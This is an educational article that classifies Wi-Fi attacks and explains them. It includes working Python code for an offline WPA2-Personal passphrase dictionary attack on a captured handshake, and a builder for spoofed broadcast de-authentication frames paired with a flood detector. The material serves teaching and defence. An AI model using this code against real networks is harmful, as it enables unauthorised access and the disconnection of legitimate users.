Over the last two decades, Wi-Fi has played an integral role in keeping us connected at home, at work, and in public places. Wireless networks are available almost everywhere, and we rely on Wi-Fi to stay productive. Several security protocols have been developed to protect Wi-Fi networks, including WEP, WPA, WPA2, and WPA3. These protocols make wireless networking more secure by providing authentication mechanisms and by protecting the confidentiality and integrity of the data.
Wi-Fi is a wireless technology built upon the IEEE 802.11 set of standards that allows capable devices such as laptops and mobile phones to form networks and exchange information without cables. Internet connectivity is typically provided by a wireless router that bridges the wireless clients to the internet; the same wireless local area network (WLAN) also provides local access, for example to send a document to a wireless printer.
Unfortunately, an adversary can use several types of attacks to compromise a Wi-Fi network's security, each targeting one of its security objectives: for example, breaking confidentiality by eavesdropping on the traffic of legitimate users. In this taxonomy we focus on Man-in-the-Middle attacks, Key-recovery attacks, Traffic Decryption attacks, and Denial of Service attacks.
A Man-in-the-Middle (MitM) attack is one in which the adversary secretly relays the communication between two parties, defeating the mutual authentication between them. In a wireless network, the adversary relays packets between the access point and a client, which allows them to eavesdrop on, replay, modify, and block packets before they reach their destination. Eavesdropping on and altering traffic lets the adversary obtain credentials, present false information to the user, use services on behalf of the victim, and perform many other malicious actions.
The adversary may attack individual clients by launching a rogue access point that appears legitimate to the victim or their device. We speak of an Evil Twin attack when the malicious network uses the same SSID and BSSID (the access point's MAC address) as the target network. The adversary can provide the internet access the user expects from the target network, making it harder to notice that the device is connected to a malicious network, while the adversary sits in a Man-in-the-Middle position and can eavesdrop on traffic. According to Norton's survey, 54% of consumers cannot distinguish between a secure and an insecure public network. The Evil Twin is of interest to both adversaries and security auditors, as many well-known auditing tools implement it.
Man-in-the-Middle attacks are versatile and powerful, as an adversary can target almost any network and security configuration. The adversary can also have different goals in mind, such as eavesdropping on traffic or collecting Wi-Fi credentials of Enterprise networks.
A Key-recovery attack is one in which the adversary attempts to recover the pre-shared key used to associate with a network. Recovering this key gives the adversary new capabilities, such as launching an Evil Twin that accepts the correct key, or associating with the network as a client and performing further attacks such as ARP spoofing.
An adversary may exploit weaknesses in the authentication protocol executed between a client and the access point. For example, the adversary can capture the 4-way handshake of a client associating with a WPA/WPA2-Personal network and perform an offline dictionary attack: each candidate passphrase is turned into a PMK, from which the session keys are derived and checked against the MIC of a captured handshake message, without any further interaction with the network. WPA3-Personal offers greater protection against these offline attacks because its SAE handshake derives the PMK through a password-authenticated key exchange, so each password guess requires a fresh online exchange with the access point.
Another technique is recovering the key through statistical analysis of encrypted traffic. Networks secured with WEP are the most susceptible: given enough captured packets, the RC4 key can be recovered within a couple of minutes using freely available tools. From WPA onward, the pre-shared key is no longer used to encrypt traffic directly; per-session keys are derived from it, which makes this kind of statistical analysis infeasible.
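The following is an added example (not code from the original page) that shows why the offline attack works for WPA2-Personal: everything needed to verify a passphrase guess is public in the captured handshake except the passphrase itself. The network parameters, nonces and the EAPOL-Key message are constructed here for reproducibility (a real attacker would take them from a capture), and the key derivation follows the WPA2-PSK/CCMP definitions: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), PTK = PRF-384 over the addresses and nonces, MIC = HMAC-SHA1-128 under the KCK.

```python
import hashlib
import hmac

# Constructed sample network and handshake parameters (hypothetical values, not a real capture).
SSID = b"CorpGuest"
AP_MAC = bytes.fromhex("0011223344aa")      # authenticator address (AA)
CLIENT_MAC = bytes.fromhex("66778899bbcc")  # supplicant address (SPA)
ANONCE = bytes(range(32))                   # nonces are random in practice; fixed here for reproducibility
SNONCE = bytes(range(32, 64))

# The MIC field starts after the 4-byte 802.1X header and 77 bytes of key descriptor fields.
MIC_OFFSET = 81


def derive_pmk(passphrase, ssid):
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output, SSID as salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11 PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter) blocks."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK for CCMP (384 bits): KCK(16) || KEK(16) || TK(16). Inputs are min/max ordered so both sides agree."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, frame):
    """HMAC-SHA1-128 MIC over the EAPOL-Key frame with its MIC field zeroed (key descriptor version 2)."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_key_msg2(snonce, mic=bytes(16)):
    """Constructed handshake message 2 (supplicant -> authenticator) carrying the given MIC."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1 MIC), pairwise key, MIC bit set
    body = (
        bytes([2])                          # key descriptor type: RSN
        + key_info.to_bytes(2, "big")
        + (16).to_bytes(2, "big")           # key length (CCMP TK)
        + (1).to_bytes(8, "big")            # replay counter
        + snonce
        + bytes(16) + bytes(8) + bytes(8)   # key IV, RSC, key ID (unused in message 2)
        + mic
        + (0).to_bytes(2, "big")            # key data length (RSN IE omitted in this sample)
    )
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # 802.1X version 2, type 3 = EAPOL-Key


def capture_handshake(passphrase):
    """Simulates what a sniffer records: message 2 with the MIC the real supplicant computed."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_key_msg2(SNONCE, eapol_mic(kck, build_eapol_key_msg2(SNONCE)))


def dictionary_attack(captured_msg2, wordlist):
    """Offline check: derive PMK and KCK per candidate and test whether it reproduces the captured MIC.
    No packet is sent; the cost per guess is one PBKDF2 run, which is exactly what GPU crackers parallelise."""
    target_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, captured_msg2), target_mic):
            return candidate
    return None


if __name__ == "__main__":
    frame = capture_handshake("Summer2023!")
    print(dictionary_attack(frame, ["password", "letmein", "Summer2023!", "qwerty"]))
```

The only secret in this computation is the passphrase; SSID, both MAC addresses, both nonces and the MIC are all readable from the captured frames. That is the property SAE removes in WPA3-Personal: the PMK is no longer a deterministic function of passphrase and SSID, so a capture alone gives the attacker nothing to test guesses against.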
A Traffic Decryption attack is one in which the adversary attempts to recover the plaintext of packets exchanged on the network, which breaches data confidentiality. Combined with other attacks, the adversary may also recover the keys used for data integrity, allowing packets to be spoofed.
Most such attacks propose a scheme to recover the plaintext of a single packet, for example by altering packets and having the access point forward them to the adversary. The proposed schemes are fairly involved, and no ready-made tooling is available; decrypting traffic on modern networks therefore appears considerably harder for an adversary or a pentester than the other attack types.
Denial of Service
A Denial of Service (DoS) attack aims to affect the availability of system resources to legitimate users. An adversary may try to overload a system with more requests than it has resources to handle. Software vulnerabilities may also lead to denial of service: for example, an adversary may include special characters in a request that the application cannot handle, causing the software to crash.
In a wireless network, an adversary can take different approaches, targeting multiple layers of the OSI model. As wireless communication happens over a shared medium where data is broadcast via radio waves, an adversary can deliberately interfere with these signals; such attacks on the Physical layer are known as radio frequency jamming. Denial of Service attacks on the Data Link layer are carried out by spoofing frames to a client or access point. For example, an adversary can spoof de-authentication frames, causing legitimate clients to be disconnected from the network. Unless management frames are protected (802.11w Protected Management Frames, optional in WPA2 and mandatory in WPA3), neither the client nor the access point can distinguish such spoofed frames from genuine ones.
Launching a Denial of Service attack is attractive for an adversary who wants to disrupt Wi-Fi communication. Some attacks, such as the one targeting TKIP, need only a handful of packets: TKIP's countermeasures shut down all TKIP traffic for 60 seconds after two MIC failures within a minute, so two forged frames are enough.
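As an added example (not code from the original page), the block below builds a raw 802.11 de-authentication frame the way a spoofing tool would, parses it back, and runs a simple flood detector over a constructed capture. The frame is an unprotected management frame: 24-byte header (frame control, duration, three addresses, sequence control) plus a 2-byte reason code, and nothing in it proves who transmitted it. The capture timestamps and addresses are constructed sample data; the per-sender threshold is an assumption to be tuned for a real environment.

```python
import struct
from collections import defaultdict

DEAUTH_FC = b"\xc0\x00"         # frame control: protocol 0, type 0 (management), subtype 12 (deauthentication)
REASON_CLASS3_NONASSOC = 7      # "class 3 frame received from nonassociated STA", the code spoofing tools usually send
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst, src, bssid, reason=REASON_CLASS3_NONASSOC, seq=0):
    """Raw 802.11 deauthentication frame (no radiotap header, no FCS). Little-endian fields per 802.11."""
    header = (DEAUTH_FC + struct.pack("<H", 0)          # duration
              + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
              + struct.pack("<H", seq << 4))              # sequence control: 12-bit sequence number, 4-bit fragment
    return header + struct.pack("<H", reason)


def parse_deauth(frame):
    """Returns (dst, src, bssid, reason) for a deauthentication frame, or None for any other frame."""
    if len(frame) < 26 or frame[0] != 0xC0:
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack("<H", frame[24:26])
    return mac_text(dst), mac_text(src), mac_text(bssid), reason


def detect_deauth_flood(timed_frames, window=1.0, threshold=10):
    """Flags (src, bssid) pairs that emit more than `threshold` deauth frames inside any `window` seconds.
    A real AP deauthenticates a client now and then; a sustained stream, typically to the broadcast
    address with reason code 7, is the signature of spoofed frames. Threshold/window are assumptions."""
    seen = defaultdict(list)
    for ts, frame in timed_frames:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        _dst, src, bssid, _reason = parsed
        seen[(src, bssid)].append(ts)
    alerts = []
    for key, times in seen.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 > threshold:
                alerts.append(key)
                break
    return alerts


def sample_capture():
    """Constructed capture: one legitimate deauth, one non-deauth frame, then a spoofed broadcast flood."""
    ap, client = "00:11:22:33:44:aa", "66:77:88:99:bb:cc"
    frames = [
        (0.00, build_deauth(client, ap, ap, reason=3)),            # AP deauthenticating a station that left
        (0.10, b"\x80\x00" + bytes(22)),                            # a beacon (subtype 8); ignored by the parser
    ]
    # Attacker spoofs the AP's address towards broadcast every 20 ms, which kicks every client at once.
    frames += [(1.0 + i * 0.02, build_deauth(BROADCAST, ap, ap, seq=i)) for i in range(50)]
    return frames


if __name__ == "__main__":
    print(detect_deauth_flood(sample_capture()))   # the spoofed (ap, ap) pair is reported
```

Because the spoofed frames carry the access point's own address, the detector can only say that someone using that address is sending far too many de-authentications; it cannot tell the impersonator from the real AP. That is exactly the gap 802.11w closes, since protected management frames carry a MIC under the pairwise key that a spoofer cannot produce.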